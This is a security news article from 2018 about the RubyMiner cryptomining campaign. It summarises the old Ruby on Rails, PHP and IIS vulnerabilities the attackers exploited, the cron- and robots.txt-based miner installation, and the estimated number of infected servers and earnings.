Skip to content
July 4, 2026
  • Linkedin
  • Twitter
  • Facebook
  • Youtube

Daily CyberSecurity

Zero-hour alerts. Unmatched analysis.

Primary Menu
  • Home
  • CVE Watchtower
  • Cyber Criminals
  • Data Leak
  • Linux
  • Malware
  • Vulnerability
  • Submit Press Release
  • Vulnerability Report
Light/Dark Button
  • Home
  • News
  • Malware
  • RubyMiner malware hits vulnerable servers to mine cryptocurrencies
  • Malware

RubyMiner malware hits vulnerable servers to mine cryptocurrencies

Do Son January 17, 2018 3 minutes read
Add as a preferred
source on Google

Security researchers recently observed RubyMiner, a new type of malware deployed online-a cryptocurrency miner found on forgotten web servers. According to findings released by Check Point and Certego and information received by researchers from Ixia, the attacks started last week, January 9-10.

 

Attack Linux and Windows servers

Ixia security researcher Stefan Tanase said RubyMiner targets Windows and Linux systems. The team behind the malware RubyMiner uses a web server fingerprinting tool called p0f to scan and identify Linux and Windows servers running outdated software. Once unpatched servers are identified, attackers can deploy known vulnerabilities on vulnerable servers and then use RubyMiner to infect them.

Check Point and Ixia said they have observed that attackers deployed the following vulnerabilities in the recent wave of attacks:

◍  Ruby on Rails XML Processor YAML Deserialization Code Execution (CVE-2013-0156) [1]
◍  PHP php-cgi Query String Parameter Code Execution (CVE-2012-1823; CVE-2012-2311; CVE-2012-2335; CVE-2012-2336; CVE-2013-4878) [1, 2, 3, 4]
◍  Microsoft IIS ASP Scripts Source Code Disclosure (CVE-2005-2678) [1]

Attackers hide the malicious code in the robots.txt file

In a report released last week, Check Point explores the RubyMiner infection routine on Linux systems based on data collected from honeypot servers and recognizes the attackers’ creativeness in some ways:

▨  The exploit code contains a series of shell commands
▨  Attackers clear all cron jobs
▨  Attackers add a new hourly cron job
▨  New cron job downloads a script hosted online
▨  This script is hosted inside the robots.txt file of various domains
▨  The script downloads and installs a modified version of the legitimate XMRig Monero miner application.

Lotem Finkelstein, a security researcher at Check Point, said attackers are now targeting Windows IIS servers but did not get a copy of the Windows version of RubyMiner. In addition, Check Point said that a malware activity in 2103 deployed the same Ruby on Rails vulnerability as RubyMiner, and Check Point speculated that the team behind it is likely to be trying to extend RubyMiner.

The trend of Monero mining malware has become increasingly evident

Overall, there has been an increase in attempts to spread cryptocurrencies in recent months to mine malware, especially in the search for Monero malware.

In addition to password hijacking events (also known as Monero), some of the Monero mining malware families and botnets in 2017 include Digmine, unknown botnets for WordPress, Hexmen, Loapi, Zealot, aterMiner, unknown zombies for IIS 6.0 servers Network, CodeFork and Bondnet. And just in the first two weeks of 2018, there have been PyCryptoMiner for Linux servers and another for Oracle WebLogic Server. In most incidents targeted at Web servers, the researchers found that attackers tried to exploit the most recent exploits because there were more vulnerable machines. Strangely enough, RubyMiner attackers use very old vulnerabilities and most security software can detect these vulnerabilities.

According to researcher Finkelstein, RubyMiner attackers may have deliberately looked for abandoned machines, such as forgotten PCs and servers with older operating systems, and infected devices to ensure long-term mining under safety radar.

RubyMiner gangs have infected more than 700 servers

According to the wallet addresses found in custom XMRig miners deployed by the RubyMiner malware, Check Point’s initial statistics show that there are around 700 RubyMiner-infected servers and the attackers earn about $540. Some experts believe that if the attackers began to use the recent loopholes, the team behind the scenes may earn more money. For example, a hacking group that started with Oracle WebLogic Server beginning in October 2017, had a profit of $226,000.

Source: BleepingComputer

Get Zero-Hour Vulnerability Alerts

Critical CVEs, CVSS scores, and PoC updates — straight to your inbox every week.


We respect your inbox. Unsubscribe anytime.

Related coverage

  • “ErrorFather” Campaign Drops Undetected Cerberus Android Banking Trojan
  • CAPTCHA to Command: Trustwave Uncovers Stealthy NodeJS Backdoor Campaign
  • 4200 websites, including U.S. and British government agencies were inserted malware to mine crypto-coins
  • ViperSoftX Resurfaces: Stealthy Crypto-Stealing Malware Hits Global Users!
  • JanaWare’s 5-Year Geofenced Ransomware Reign

Support Our Threat Intelligence

If you find our CVE report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee Logo Buy Me a Coffee PayPal
Crypto QR Code
USDT (TRC20):
TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm
USDT (ERC20):
0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce

Share this article:

Facebook Post LinkedIn Telegram
Written by
@DdoS · Security Researcher

Do Son

Do Son is the Founder and Editor of SecurityOnline.info. Working in cybersecurity since 2013, he reports on vulnerabilities, malware, and emerging threats, providing timely analysis to help organizations and individuals stay ahead of evolving risks.

Tags: RubyMiner

Search

Translation

CVE WATCHTOWER
🚨

Receive alerts for vulnerabilities being exploited in the wild.

⚡

Get notified instantly when a Proof of Concept (PoC) exploit is published.

🔍

Access critical info on vulnerabilities even when marked as "RESERVED".

🧠

Insights powered by decades of expertise and global intelligence sources.

🎯

Customize alerts with up to 10 keywords for your specific tech stack.

📊

Export the raw CVE database for SIEM integration and reporting.

Upgrade Package

🚨 Active Exploits in the Wild

  • CVE-2026-48282CVSS 10.0
    ColdFusion versions 2025.9, 2023.20 and earlier are affected by an Improper Limitation of a Pathname to a Restricted...
    Admin intel📅 Updated: Jul 3, 2026
  • CVE-2024-14037CVSS 9.8
    Redsea Cloud eHR contains an arbitrary file upload vulnerability that allows unauthenticated attackers to achieve remote code execution...
    Admin intel📅 Updated: Jul 3, 2026
  • CVE-2026-8451CVSS 8.8
    Insufficient input validation in NetScaler ADC and NetScaler Gateway leading to memory overread if NetScaler ADC or NetScaler Gateway is configured...
    Admin intel📅 Updated: Jul 2, 2026
  • CVE-2026-8037CVSS 9.6
    OS Command Injection Remote Code Execution Vulnerability in API in Progress ADC Products allows an un-authenticated attacker to...
    Admin intel📅 Updated: Jul 1, 2026
  • CVE-2026-45659CVSS 8.8
    Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.
    CISA KEV📅 Added to KEV: Jul 1, 2026
  • CVE-2026-48558CVSS 10.0
    SimpleHelp versions 5.5.15 and prior and 6.0 pre-release versions contain an authentication bypass vulnerability in the OIDC authentication...
    Admin intelCISA KEV📅 Added to KEV: Jun 29, 2026📅 Updated: Jun 29, 2026
  • CVE-2026-46817CVSS 9.8
    Vulnerability in the Oracle Payments product of Oracle E-Business Suite (component: File Transmission). Supported versions that are affected...
    Admin intel📅 Updated: Jun 29, 2026
  • CVE-2026-28496CVSS 9.4
    FOSSBilling is a free, open-source billing and client management system. Versions prior to 0.8.0 have a Server-Side Template...
    Admin intel📅 Updated: Jun 25, 2026
Powered by CVE Watchtower

🔴 Live Critical Threats

  • CVE-2026-58426CVSS 9.6
    Gitea Actions Artifacts V4 signed URL HMAC ambiguity allows cross-repository artifact read...
  • CVE-2026-58289CVSS 9.0
    Access of resource using incompatible type ('type confusion') in Microsoft Edge (Chromium-based)...
  • CVE-2026-22874CVSS 9.6
    Gitea versions up to and including 1.26.2 have incomplete SSRF protection in...
  • CVE-2026-20896CVSS 9.8
    Gitea Docker image versions up to and including 1.26.2 use REVERSE_PROXY_TRUSTED_PROXIES=* by...
  • CVE-2026-4321CVSS 9.8
    Improper neutralization of special elements used in an SQL command ('SQL injection')...
  • CVE-2026-14544CVSS 9.8
    A flaw was found in HPLIP (HP Linux Imaging and Printing Software)....
  • CVE-2026-9725CVSS 9.1
    The Printcart Web to Print Product Designer for WooCommerce plugin for WordPress...
  • CVE-2026-13768CVSS 10.0
    Gardyn devices expose a privileged iothubowner key. Access to this key will...
  • CVE-2026-57100CVSS 9.9
    Server-side request forgery (ssrf) in Microsoft Entra Provisioning Service (SyncFabric) allows an...
  • CVE-2026-45499CVSS 9.9
    Server-side request forgery (ssrf) in Azure OpenAI allows an authorized attacker to...
Powered by CVE WATCHTOWER

Get Zero-Hour Vulnerability Alerts

Critical CVEs, CVSS scores, and PoC updates — straight to your inbox every week.

    We respect your inbox. Unsubscribe anytime.

    Our Websites
  • Penetration Testing Tools
  • The Daily Information Technology
  • Daily CyberSecurity

    • About SecurityOnline.info
    • Advertise with us
    • Announcement
    • Contact
    • Contributor Register
    • Login
    • About SecurityOnline.info
    • Advertise on SecurityOnline.info
    • Contact Us

    When you purchase through links on our site, we may earn an affiliate commission. Here’s how it works

    • Disclaimer
    • Privacy Policy
    • DMCA NOTICE
    • Linkedin
    • Twitter
    • Facebook
    • Youtube
    © 2017 - 2026 Daily CyberSecurity. All Rights Reserved.